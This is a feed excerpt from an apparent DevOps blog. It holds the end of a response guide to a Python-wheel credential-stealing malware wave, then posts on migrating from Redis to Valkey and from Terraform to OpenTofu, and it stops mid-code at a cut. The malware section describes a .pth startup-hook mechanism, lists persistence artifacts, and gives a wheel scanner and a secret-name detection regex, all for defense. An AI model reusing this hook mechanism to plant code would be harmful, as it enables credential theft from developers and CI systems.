<li><strong>Package publishing.</strong> PyPI, npm, RubyGems, JFrog, and CircleCI tokens. Re-issue with 2FA and scoped permissions.</li>
<li><strong>Cloud and orchestration.</strong> AWS, GCP, Azure, Kubernetes service-account tokens, and Vault tokens. Review CloudTrail or the equivalent for use during the exposure window.</li>
<li><strong>Keys and local config.</strong> SSH keys, Docker credentials, Git credential helpers, and cloud CLI profiles.</li>
<li><strong>AI and developer tools.</strong> Anthropic and Claude or MCP tokens, and anything stored in editor or agent configs.</li>
</ol>
<p>Then clean the environment:</p>
<ul>
<li>Remove the malicious releases and pin to a known-good version, or remove the package entirely</li>
<li>Rebuild the affected machine or container from a clean image rather than deleting files in place</li>
<li>Delete the persistence artifacts: <code>gh-token-monitor</code>, <code>.claude/setup.mjs</code>, <code>.github/setup.js</code>, the injected <code>codeql.yml</code>, and <code>~/.local/share/updater/update.py</code></li>
<li>Remove any attacker-created public repos and the <code>format-results</code> artifacts from your org</li>
</ul>
<h2 id="h2-how-to-prevent-the-next-one" class="group relative scroll-mt-24">
        <a href="#h2-how-to-prevent-the-next-one" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How to prevent the next one
        </a>
        </h2><p>The mechanism changes each wave, but the defenses are stable:</p>
<ul>
<li><strong>Pin and verify.</strong> Use a lockfile with hashes (<code>pip install --require-hashes</code>, <code>uv.lock</code>, or <code>poetry.lock</code>). Hash pinning stops a surprise patch release from sliding in.</li>
<li><strong>Scan for the pattern, not the name.</strong> A new wave will use new package names. Flag wheels that ship an executable <code>.pth</code> line, download a runtime or binary, write executables to temp directories, or hand off to a JavaScript payload.</li>
<li><strong>Isolate installs.</strong> Run <code>pip install</code> for untrusted or first-time dependencies in a sandbox or ephemeral container with no ambient credentials. CI runners should use short-lived, scoped tokens, not long-lived org secrets.</li>
<li><strong>Lock down runners.</strong> Egress-filtering tools for CI, such as StepSecurity harden-runner, are worth it precisely because this malware checks for them and tries to avoid them.</li>
<li><strong>Audit the AI toolchain.</strong> Treat Claude, MCP, IDE, and workflow configs as part of your attack surface now. These campaigns have moved past package hooks into developer tooling, and a poisoned <code>.github/workflows/</code> file or agent config persists long after the package is gone.</li>
</ul>
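<p>One way to implement the "scan for the pattern, not the name" check from the list above, as an added example rather than code from the original post or from any vendor it cites: a static triage that opens a wheel as a zip, without installing it, and flags <code>.pth</code> lines the interpreter would execute along with bundled JavaScript. The sample package and file names are constructed, and the <code>block</code>/<code>review</code>/<code>ok</code> labels and the size limit are assumptions.</p>

```python
"""Static triage of a wheel for the startup-hook pattern (added example)."""
import io
import sys
import zipfile

MAX_PTH_BYTES = 64 * 1024          # assumption: real .pth files are a few lines long
SCRIPT_SUFFIXES = (".js", ".mjs")  # JavaScript hand-off shipped inside a Python wheel


def executable_pth_lines(text):
    """Return the lines that site.py would exec() at interpreter startup.

    site.py runs a .pth line as code when it starts with "import " or
    "import\\t"; any other non-comment line is only a path for sys.path.
    """
    return [ln for ln in text.splitlines() if ln.startswith(("import ", "import\t"))]


def scan_wheel(wheel):
    """Inspect a wheel (path or binary file object) without installing or running it."""
    report = {"pth": [], "scripts": [], "oversized_pth": []}
    with zipfile.ZipFile(wheel) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.endswith(".pth"):
                # Refuse to decompress an implausibly large .pth; flag it instead.
                if info.file_size > MAX_PTH_BYTES:
                    report["oversized_pth"].append(name)
                    continue
                text = zf.read(info).decode("utf-8", errors="replace")
                for line in executable_pth_lines(text):
                    report["pth"].append((name, line[:120]))
            elif name.endswith(SCRIPT_SUFFIXES):
                report["scripts"].append(name)
    return report


def triage(report):
    """Executable .pth plus bundled JavaScript -> block; .pth hook alone -> review.

    JavaScript on its own is common in legitimate wheels (web assets), so it is
    only treated as a signal when it appears next to a startup hook.
    """
    if report["pth"] or report["oversized_pth"]:
        return "block" if report["scripts"] else "review"
    return "ok"


def build_sample_wheel(files):
    """Build an in-memory, wheel-shaped zip from {member_name: text} (constructed input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, text in files.items():
            zf.writestr(name, text)
    buf.seek(0)
    return buf


# Constructed samples. The .pth body is a harmless stand-in for a startup hook.
SUSPICIOUS = {
    "demo_pkg/__init__.py": "",
    "demo_pkg-setup.pth": "import sys; sys.stdout.write('')\n",
    "demo_pkg/_index.js": "// placeholder\n",
}
HOOK_ONLY = {
    "demo_pkg/__init__.py": "",
    "demo_pkg.pth": "../src\nimport sys; sys.stdout.write('')\n",
}
CLEAN = {
    "demo_pkg/__init__.py": "",
    "demo_pkg.pth": "# plain path entry, nothing executed\n../src\n",
}


if __name__ == "__main__":
    # Scan wheel files given on the command line, or the constructed samples.
    targets = [(p, p) for p in sys.argv[1:]] or [
        (label, build_sample_wheel(files))
        for label, files in (("suspicious", SUSPICIOUS),
                             ("hook-only", HOOK_ONLY),
                             ("clean", CLEAN))
    ]
    for label, wheel in targets:
        result = scan_wheel(wheel)
        print(label, triage(result), result)
```

<p>Run it over downloaded wheels (<code>pip download --no-deps</code> fetches them without installing) before they reach a machine that holds credentials.</p>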
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        </h2><p>The Hades wave is a reminder that &quot;I only use Python&quot; is not a safe place to stand. Shai-Hulud now ships Python wheels that execute at interpreter startup through a <code>.pth</code> hook, pull down their own runtime, and drain whatever credentials a developer or CI machine can see.</p>
<p>The mental model to keep:</p>
<ul>
<li>Installation is execution. A <code>pip install</code> of a poisoned wheel can run code on the next <code>python</code> start, with no import.</li>
<li>The target is your secrets, especially CI/CD and GitHub tokens, so a hit on one runner can become a hit on your whole supply chain.</li>
<li>The fix order is rotate, rebuild, then pin. After that, make the next wave easier to catch with hash pinning and isolated installs.</li>
</ul>
<p>Check your environment with the commands above, rotate anything that was exposed, and pin your dependencies so the next mass patch release cannot walk straight in.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Is Valkey Ready to Replace Redis in 2026?]]></title>
      <link>https://devops-daily.com/posts/is-valkey-ready-to-replace-redis-2026</link>
      <description><![CDATA[Valkey forked from Redis after the 2024 license change and has matured fast. Here is whether it is production-ready, how the migration works, and whether the AGPL question even applies to you.]]></description>
      <pubDate>Fri, 05 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/is-valkey-ready-to-replace-redis-2026</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Valkey]]></category><category><![CDATA[Redis]]></category><category><![CDATA[Caching]]></category><category><![CDATA[Open Source]]></category><category><![CDATA[Migration]]></category><category><![CDATA[DevOps]]></category>
      <content:encoded><![CDATA[<p>If you run Redis in production, the last two years gave you a question you did not ask for: stay on Redis, or move to Valkey? In 2024 the answer was &quot;wait and see.&quot; The fork was new, the feature gap was tiny, and nobody wanted to re-point their cache layer at a project with no track record.</p>
<p>In 2026 the picture is clear enough to act on. Valkey is on its 9.1 release, it is the default in-memory store on AWS ElastiCache, and it has its own performance roadmap. Redis, for its part, went back to an open-source license with Redis 8 and pulled the old Redis Stack modules into the core engine. This is no longer a simple fork-versus-original story.</p>
<p>This post answers the practical question directly. Is Valkey ready for production, where do the two projects actually differ now, does the AGPL license that Redis adopted affect you, and how does the migration work if you decide to move? For a side-by-side feature table, pricing, and a decision matrix, see our companion <a href="/comparisons/valkey-vs-redis">Valkey vs Redis comparison</a>.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><ul>
<li>Valkey is production-ready in 2026. It is wire-compatible with Redis, governed by the Linux Foundation, on a steady release cadence (9.1 in May 2026), and is the default on AWS ElastiCache and MemoryDB.</li>
<li>Redis is open source again under AGPLv3 since Redis 8, so &quot;Redis is no longer open source&quot; is out of date. The catch is that AGPL is copyleft, while Valkey stays on permissive BSD.</li>
<li>The AGPL question only bites if you modify the Redis source and offer it to others over a network. If you just use Redis as a cache or database, it changes almost nothing.</li>
<li>Migration from Redis 7.2.x is close to a drop-in: same protocol, same RDB and AOF files, and an in-place upgrade path on ElastiCache.</li>
<li>The real divergence is features added after the fork. Redis 8 bundles JSON, search, time series, and vector sets into core. Valkey ships those as separate modules.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>A running Redis instance (self-hosted or managed) and access to its configuration</li>
<li>The ability to take and restore an RDB snapshot, or to run a replica</li>
<li>A staging environment where you can test before touching production</li>
<li>Familiarity with <code>redis-cli</code> and your client library&#39;s connection settings</li>
</ul>
<h2 id="h2-how-we-got-here-the-license-timeline" class="group relative scroll-mt-24">
        <a href="#h2-how-we-got-here-the-license-timeline" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          How we got here: the license timeline
        </a>
        </h2><p>The decision makes more sense once you have the sequence straight.</p>
<pre><code class="hljs language-text">2009-2024   Redis ships under the permissive BSD license
Mar 2024    Redis Inc. relicenses to SSPLv1 + RSALv2 (source-available, not OSI open source)
Mar 2024    Linux Foundation forks Redis 7.2.4 as Valkey (BSD), backed by AWS, Google, Oracle, Snap
2024-2025   Valkey ships 8.0 and 8.1 with multi-threaded I/O and big throughput gains
May 2025    Redis 8 adds AGPLv3 as a third license; Redis Open Source is OSI open source again
2026        Valkey 9.1 (May) and Redis 8.2 (Feb) both shipping; both fast, both open source
</code></pre><p>Two things matter in that timeline. First, Valkey never carried the source-available license. It forked from the last BSD release, so its license has been permissive the whole time. Second, Redis did not stay source-available. Redis 8 added the OSI-approved AGPLv3, which means Redis is open source again, just under a copyleft license instead of the old permissive one.</p>
<h2 id="h2-is-valkey-actually-production-ready" class="group relative scroll-mt-24">
        <a href="#h2-is-valkey-actually-production-ready" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Is Valkey actually production-ready?
        </a>
        </h2><p>Yes, and the evidence is not subtle.</p>
<p><strong>Releases and stability.</strong> Valkey shipped 8.0 and 8.1 through 2024 and 2025, then 9.0 and 9.1 in 2026. The 8.1 line is still maintained (8.1.8 landed in June 2026), so you get the same kind of long-lived release branches you expect from mature infrastructure software.</p>
<p><strong>Performance.</strong> Valkey put most of its early effort into multi-core throughput. Valkey 9 added pipeline memory prefetching, zero-copy responses, and SIMD optimizations for commands like <code>BITCOUNT</code>. Valkey 9.1 reports around 2.1 million requests per second on 512-byte payloads. Redis 8 also added large gains, so both are fast; Valkey tends to pull ahead on many cores.</p>
<p><strong>Cloud adoption.</strong> This is the strongest signal. AWS made Valkey the default for new ElastiCache and MemoryDB clusters and prices it below Redis OSS, roughly 20% lower on ElastiCache and about 30% lower on MemoryDB. Google Cloud offers Memorystore for Valkey, and Oracle supports it on OCI Cache. When the major clouds make a fork their default, the &quot;will it survive&quot; question is settled.</p>
<p><strong>Governance.</strong> Valkey sits under the Linux Foundation with a multi-company steering model. No single vendor can relicense it, which is the exact failure mode that started this whole story.</p>
<h2 id="h2-where-valkey-and-redis-diverge-now" class="group relative scroll-mt-24">
        <a href="#h2-where-valkey-and-redis-diverge-now" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where Valkey and Redis diverge now
        </a>
        </h2><p>Up to Redis 7.2.4 the two are the same code. After the fork they drew apart, and that is where your decision lives.</p>
<p>The biggest difference is the built-in feature set. Redis 8 folded the former Redis Stack into the core engine, so JSON, the Query Engine, time series, probabilistic types, and vector sets all ship in the box. Vector sets in particular, built by the original Redis creator, make Redis a strong default for AI and semantic-search features.</p>
<p>Valkey keeps the core lean and ships those capabilities as separate modules, such as <code>valkey-search</code> and <code>valkey-json</code>. You get similar functionality, but you assemble it rather than getting it bundled. If your workload is a plain cache, a session store, a rate limiter, or a queue, this difference does not touch you. If you want vector search inside the data store with no extra setup, Redis 8 is ahead today.</p>
<p>For the full side-by-side across licensing, performance, modules, and managed-service cost, the <a href="/comparisons/valkey-vs-redis">Valkey vs Redis comparison</a> lays it out in a table.</p>
<h2 id="h2-the-agpl-question-does-it-actually-affect-you" class="group relative scroll-mt-24">
        <a href="#h2-the-agpl-question-does-it-actually-affect-you" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The AGPL question: does it actually affect you?
        </a>
        </h2><p>This is the part that gets the most confused commentary, so be precise about it.</p>
<p>AGPLv3 is a copyleft license with a network clause. The obligation it adds, on top of the GPL, is this: if you modify the software and let users interact with it over a network, you have to make your modified source available to those users. That is the whole of it.</p>
<p>Walk it through your own setup:</p>
<pre><code class="hljs language-text">Do you modify the Redis source code?
        |
        +-- No --&gt; AGPL changes nothing for you. Use Redis 8 freely.
        |
        Yes
        |
Do you offer that modified Redis to others over a network
(for example, as part of a hosted product)?
        |
        +-- No (internal use only) --&gt; No source-disclosure obligation in practice.
        |
        +-- Yes --&gt; You may have to publish your modifications. This is the
                    case where teams choose Valkey&#x27;s BSD license instead.
</code></pre><p>For the large majority of teams, the honest answer is that AGPL does not affect them. You pull the official image, run it as a cache or database, and never touch the source. Nothing is triggered. The teams that genuinely care are the ones building a product on top of a modified engine, especially anyone offering a hosted data-store service. For them, Valkey&#39;s permissive BSD license removes the question entirely, which is exactly why several vendors standardized on Valkey.</p>
<h2 id="h2-migrating-from-redis-to-valkey" class="group relative scroll-mt-24">
        <a href="#h2-migrating-from-redis-to-valkey" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Migrating from Redis to Valkey
        </a>
        </h2><p>Here is the good news that makes the decision low-risk: for Redis 7.2.x and earlier, moving to Valkey is close to a drop-in. The two speak the same RESP protocol and read the same on-disk formats.</p>
<h3 id="h3-step-1-confirm-your-version-and-features" class="group relative scroll-mt-24">
        <a href="#h3-step-1-confirm-your-version-and-features" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 1: confirm your version and features
        </a>
        </h3><p>Check what you are running and whether you use any Redis 8 core modules.</p>
<pre><code class="hljs language-bash">redis-cli INFO server | grep redis_version
<span class="hljs-comment"># redis_version:7.2.5</span>

<span class="hljs-comment"># If you use modules, list them. Valkey core will not have Redis 8 modules.</span>
redis-cli MODULE LIST
</code></pre><p>If <code>MODULE LIST</code> is empty and you are on 7.2.x, you are in the easy path. If you depend on Redis Query Engine, JSON, or vector sets, plan to add the matching Valkey modules or keep those workloads on Redis.</p>
<h3 id="h3-step-2-back-up-your-data" class="group relative scroll-mt-24">
        <a href="#h3-step-2-back-up-your-data" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 2: back up your data
        </a>
        </h3><p>Take an RDB snapshot before anything else.</p>
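<pre><code class="hljs language-bash"><span class="hljs-comment"># Trigger a snapshot and copy the file to the backup directory.</span>
<span class="hljs-comment"># SAVE blocks the server until the snapshot is written.</span>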
redis-cli SAVE
<span class="hljs-built_in">cp</span> /var/lib/redis/dump.rdb /backup/dump.rdb.$(<span class="hljs-built_in">date</span> +%F)
</code></pre><h3 id="h3-step-3-stand-up-valkey-and-load-the-snapshot" class="group relative scroll-mt-24">
        <a href="#h3-step-3-stand-up-valkey-and-load-the-snapshot" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 3: stand up Valkey and load the snapshot
        </a>
        </h3><p>Valkey reads the same <code>dump.rdb</code>, so you can point a fresh Valkey instance at it.</p>
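<pre><code class="hljs language-bash"><span class="hljs-comment"># Run Valkey 9.1 in a container, mounting the existing RDB.</span>
<span class="hljs-comment"># Valkey also writes its own snapshots to --dbfilename, so keep a second copy of the backup elsewhere.</span>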
docker run -d --name valkey \
  -p 6379:6379 \
  -v /backup:/data \
  valkey/valkey:9.1 valkey-server --<span class="hljs-built_in">dir</span> /data --dbfilename dump.rdb.2026-06-05

<span class="hljs-comment"># Verify it came up and loaded your keys</span>
valkey-cli DBSIZE
</code></pre><p>The CLI is <code>valkey-cli</code>, but <code>redis-cli</code> works against Valkey too, since the protocol is identical.</p>
<h3 id="h3-step-4-cut-over-clients" class="group relative scroll-mt-24">
        <a href="#h3-step-4-cut-over-clients" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 4: cut over clients
        </a>
        </h3><p>You do not need a new client library. Point your existing Redis client at the Valkey endpoint. The connection settings and commands are the same.</p>
<pre><code class="hljs language-text"># Before
REDIS_URL=redis://redis.internal:6379

# After (same scheme, same port, new host)
REDIS_URL=redis://valkey.internal:6379
</code></pre><p>On AWS, the path is even shorter. ElastiCache offers an in-place upgrade from supported Redis OSS versions to Valkey, so you can switch the engine on an existing cluster without standing up new infrastructure.</p>
<h3 id="h3-step-5-test-on-staging-first" class="group relative scroll-mt-24">
        <a href="#h3-step-5-test-on-staging-first" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Step 5: test on staging first
        </a>
        </h3><p>Run your full test suite against Valkey in staging before production. Pay attention to anything that calls a command added after the 7.2.4 fork, or any module you assumed was present. A clean migration behaves identically because the command surface is the same.</p>
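<p>The Step 1 decision and the Step 3 verification can be scripted. The following is an added example, not code from the original post or from the Valkey project: it parses the text that <code>redis-cli INFO server</code> and <code>redis-cli MODULE LIST</code> print and applies the rule above (7.2.x or earlier with no modules is the easy path). The function names and sample outputs are constructed for illustration. It also covers a detail that matters after cutover: Valkey keeps reporting a Redis-compatible <code>redis_version</code> and identifies itself through <code>server_name</code> and <code>valkey_version</code>.</p>

```python
import re

# Constructed samples: the shape of `redis-cli INFO server` and
# `redis-cli MODULE LIST` output, not captured from a real host.
SAMPLE_INFO_EASY = "# Server\r\nredis_version:7.2.5\r\nredis_mode:standalone\r\n"
SAMPLE_INFO_REDIS8 = "# Server\r\nredis_version:8.0.2\r\nredis_mode:standalone\r\n"
SAMPLE_INFO_VALKEY = (
    "# Server\r\nredis_version:7.2.4\r\nserver_name:valkey\r\nvalkey_version:9.1.0\r\n"
)
SAMPLE_MODULES_NONE = "(empty array)\n"
SAMPLE_MODULES_ONE = (
    '1) 1) "name"\n'
    '   2) "examplemod"\n'
    '   3) "ver"\n'
    '   4) (integer) 10000\n'
)


def parse_info(text):
    """Turn INFO output into a dict. Handles CRLF endings and '# Section' headers."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        key, value = line.split(":", 1)
        fields[key] = value
    return fields


def parse_module_names(text):
    """Extract module names from MODULE LIST output.

    Accepts both the numbered form redis-cli prints on a terminal and the
    one-value-per-line form it prints when piped.
    """
    tokens = []
    for line in text.splitlines():
        token = re.sub(r"^(?:\s*\d+\)\s*)+", "", line).strip().strip('"')
        if token:
            tokens.append(token)
    names = []
    i = 0
    while i + 1 < len(tokens):
        if tokens[i] == "name":
            names.append(tokens[i + 1])
            i += 2
        else:
            i += 1
    return names


def check_migration(info_text, module_text):
    """Apply the post's rule: 7.2.x or earlier with no modules is the easy path."""
    info = parse_info(info_text)
    modules = parse_module_names(module_text)
    if info.get("server_name") == "valkey":
        # After cutover redis_version alone cannot tell the two servers apart.
        return {"path": "already-valkey", "modules": modules, "reasons": []}
    match = re.match(r"(\d+)\.(\d+)", info.get("redis_version", ""))
    if not match:
        return {"path": "unknown", "modules": modules,
                "reasons": ["no redis_version field in INFO output"]}
    major_minor = (int(match.group(1)), int(match.group(2)))
    reasons = []
    if major_minor > (7, 2):
        reasons.append("redis_version %s is newer than 7.2.x" % info["redis_version"])
    if modules:
        reasons.append("modules loaded: " + ", ".join(modules))
    return {"path": "plan" if reasons else "easy", "modules": modules, "reasons": reasons}


if __name__ == "__main__":
    print(check_migration(SAMPLE_INFO_EASY, SAMPLE_MODULES_NONE))
    print(check_migration(SAMPLE_INFO_REDIS8, SAMPLE_MODULES_ONE))
    print(check_migration(SAMPLE_INFO_VALKEY, ""))
```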
<h2 id="h2-should-you-switch-a-quick-framework" class="group relative scroll-mt-24">
        <a href="#h2-should-you-switch-a-quick-framework" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Should you switch? A quick framework
        </a>
        </h2><p>There is no single right answer, so match the choice to your situation.</p>
<p><strong>Move to Valkey</strong> if you self-host and want a permissive license that cannot be changed under you, if you want to cut managed cache costs on AWS or Google Cloud, or if you build a product on top of the engine and want to avoid the AGPL network clause.</p>
<p><strong>Stay on or choose Redis 8</strong> if you need the bundled core modules, especially vector sets and the Query Engine for AI features, or if you rely on Redis Enterprise capabilities like active-active replication and a vendor support contract.</p>
<p><strong>It is a tie, so do not rush</strong> if you run a managed cache, never modify the engine, and are happy with your costs. Both are open source, both are fast, and the migration stays easy. Switch the day cost or features change the math, not before.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        </h2><p>The Valkey question is settled enough to act on in 2026. Valkey is production-ready, wire-compatible, governed by a foundation, and cheaper on managed services. Redis answered the criticism that started the fork by returning to open source with Redis 8, and it now ships a richer core with search and vector sets built in.</p>
<p>The mental model to keep:</p>
<ul>
<li>The license split is real but narrower than the headlines: BSD (Valkey) versus AGPL copyleft (Redis). AGPL only matters if you modify and serve the engine.</li>
<li>The migration is easy and low-risk for Redis 7.2.x: same protocol, same files, and an in-place path on ElastiCache.</li>
<li>The divergence to watch is post-fork features. Redis 8 bundles modules into core; Valkey keeps them separate.</li>
</ul>
<p>Decide on what you actually need, the license terms, the managed cost, and the built-in features, rather than on which project has the louder story. For the head-to-head table, the <a href="/comparisons/valkey-vs-redis">Valkey vs Redis comparison</a> covers it point by point.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[OpenTofu in 2026: Should You Switch from Terraform (and What It Actually Costs You)]]></title>
      <link>https://devops-daily.com/posts/opentofu-2026-switch-from-terraform</link>
      <description><![CDATA[OpenTofu has matured into a real Terraform alternative in 2026. Here is what the fork gives you, why the migration is easier than you think, and where the actual lock-in hides.]]></description>
      <pubDate>Tue, 02 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/opentofu-2026-switch-from-terraform</guid>
      <category><![CDATA[Terraform]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Terraform]]></category><category><![CDATA[OpenTofu]]></category><category><![CDATA[Infrastructure as Code]]></category><category><![CDATA[Migration]]></category><category><![CDATA[State Management]]></category><category><![CDATA[DevOps]]></category>
      <content:encoded><![CDATA[<p>If you manage infrastructure with Terraform, one question has been sitting in your backlog since 2023: do you stay on Terraform, or move to OpenTofu? For a long time the honest answer was &quot;wait and see.&quot; The fork was young, the feature gap was small, and nobody wanted to bet production state files on a project that might fade.</p>
<p>In 2026 the picture is clearer. HashiCorp is now part of IBM, Terraform stayed on a source-available license, and OpenTofu has shipped real features that Terraform&#39;s open-source CLI does not have. The fork is no longer a protest vote. It is a working tool with its own roadmap.</p>
<p>This post answers the practical question directly: what changed, what OpenTofu gives you that Terraform does not, how the migration actually works (it is easier than most people expect), where the real lock-in hides, and a simple framework for deciding whether to switch now, run both, or stay put.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TLDR
        </a>
        </h2><ul>
<li>Terraform is now an IBM product under the BSL 1.1 source-available license. OpenTofu is MPL 2.0, sits in the CNCF, and is governed so no single company controls it.</li>
<li>OpenTofu v1.12 (May 2026) ships features Terraform&#39;s open-source CLI lacks: native state encryption, the <code>-exclude</code> flag, provider <code>for_each</code>, and early variable evaluation.</li>
<li>Migrating from Terraform to OpenTofu is the easy part. The state format is the same, you swap the <code>terraform</code> binary for <code>tofu</code>, run <code>tofu init</code>, and validate with <code>tofu plan</code>. It is reversible.</li>
<li>The real lock-in starts later, once you adopt OpenTofu-only features like encrypted state. After that, going back to Terraform is no longer clean.</li>
<li>Switch now if you want the new features or open governance. Run both if you have a large estate tied to HashiCorp Cloud. Stay if you are happy on Terraform Cloud and licensing does not affect you.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>A working Terraform setup (CLI 1.5 or later) with at least one project and a state file</li>
<li>Access to your state backend (S3, GCS, Azure Blob, Terraform Cloud, or local)</li>
<li>Permission to change your CI/CD pipeline definitions</li>
<li>A test or staging workspace you can migrate before touching production</li>
</ul>
<h2 id="h2-the-2026-reality-who-owns-what" class="group relative scroll-mt-24">
        <a href="#h2-the-2026-reality-who-owns-what" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The 2026 reality: who owns what
        </a>
        </h2><p>Two things drive the decision in 2026, and neither is about syntax.</p>
<p>First, ownership. IBM completed its acquisition of HashiCorp, a 6.4 billion dollar deal, in early 2025. Terraform is now an IBM product. IBM has a long history of keeping acquisitions open, with Red Hat the obvious example, but the Terraform license has not moved.</p>
<p>Second, licensing. In August 2023 HashiCorp moved Terraform from the Mozilla Public License (MPL) 2.0 to the Business Source License (BSL) 1.1. The BSL is source-available, not open source. It restricts using Terraform to build a competing product, and each release converts back to MPL only four years after it ships. For most teams that run Terraform internally, the BSL changes nothing day to day. For anyone building tooling around Terraform, or who cares about vendor-neutral governance, it matters.</p>
<p>OpenTofu sits on the other side of that line. It was forked from the last MPL-licensed Terraform release, so the BSL never applied to its code. The CNCF accepted OpenTofu in April 2025, and a Technical Steering Committee under the Linux Foundation sets the roadmap. No single company has the votes to change the license or the direction.</p>
<pre><code class="hljs language-text">                 Terraform                  OpenTofu
License          BSL 1.1 (source-available) MPL 2.0 (open source)
Owner            IBM (HashiCorp)            CNCF / Linux Foundation
Governance       Single vendor              Multi-company TSC
State format     .tfstate (JSON)            .tfstate (JSON, same)
</code></pre><h2 id="h2-what-opentofu-has-that-terraform-does-not" class="group relative scroll-mt-24">
        <a href="#h2-what-opentofu-has-that-terraform-does-not" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What OpenTofu has that Terraform does not
        </a>
        </h2><p>By 2026 OpenTofu is past parity in several areas. These are the features that actually pull teams across.</p>
<h3 id="h3-native-state-encryption" class="group relative scroll-mt-24">
        <a href="#h3-native-state-encryption" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Native state encryption
        </a>
        </h3><p>Terraform&#39;s state file holds everything, including resource attributes that are often sensitive. By default it sits in plaintext in your backend. If someone reads your S3 bucket, they read your state.</p>
<p>OpenTofu encrypts state at rest, including remote state, with no external wrapper. You configure a key provider (AWS KMS, GCP KMS, Vault, or a passphrase) and a method, and OpenTofu handles the rest.</p>
<pre><code class="hljs language-hcl"><span class="hljs-keyword">terraform</span> {
  encryption {
    key_provider <span class="hljs-string">&quot;aws_kms&quot;</span> <span class="hljs-string">&quot;main&quot;</span> {
      kms_key_id = <span class="hljs-string">&quot;arn:aws:kms:us-east-1:111122223333:key/abcd-1234&quot;</span>
      region     = <span class="hljs-string">&quot;us-east-1&quot;</span>
      key_spec   = <span class="hljs-string">&quot;AES_256&quot;</span>
    }

    method <span class="hljs-string">&quot;aes_gcm&quot;</span> <span class="hljs-string">&quot;main&quot;</span> {
      keys = key_provider.aws_kms.main
    }

    state {
      method = method.aes_gcm.main
    }

    plan {
      method = method.aes_gcm.main
    }
  }
}
</code></pre><p>Now, even if the backend is exposed, the state and plan files are unreadable without the key. Terraform&#39;s open-source CLI has no equivalent.</p>
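<p>To see what plaintext state exposes, and to confirm that a backend object is actually encrypted after you enable the block above, you can audit the state JSON itself. The following is an added example, not code from the original post or from the OpenTofu project. It reports only the locations of likely secrets, never their values. Assumptions: the secret-name pattern is a heuristic chosen for this example, both sample documents are constructed, and an encrypted state is recognised by an <code>encrypted_data</code> field in its JSON envelope, which you should confirm against the output of your own OpenTofu version.</p>

```python
import json
import re

# Heuristic for this example: attribute names that commonly hold secrets.
SECRET_NAME = re.compile(r"(password|secret|token|private_key|access_key)", re.I)

# Constructed plaintext state in the version 4 layout (not from a real backend).
SAMPLE_PLAINTEXT = json.dumps({
    "version": 4,
    "serial": 7,
    "lineage": "constructed-example",
    "outputs": {
        "db_password": {"value": "example-only", "type": "string", "sensitive": True},
        "endpoint": {"value": "db.example.internal", "type": "string"},
    },
    "resources": [{
        "mode": "managed",
        "type": "aws_db_instance",
        "name": "primary",
        "instances": [{"attributes": {
            "username": "app",
            "password": "example-only",
            "manage_master_user_password": None,
            "tags": {"team": "platform"},
        }}],
    }],
})

# Constructed envelope. Assumption: encrypted state carries an encrypted_data field.
SAMPLE_ENCRYPTED = json.dumps({
    "serial": 7,
    "lineage": "constructed-example",
    "meta": {},
    "encrypted_data": "b3BhcXVl",
    "encryption_version": "v0",
})


def _leaves(node, path):
    """Yield (path, value) for every scalar under a nested dict/list."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _leaves(value, path + [str(key)])
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _leaves(value, path + [str(index)])
    else:
        yield path, node


def audit_state(raw):
    """Classify a state blob and list where plaintext secrets sit (paths only)."""
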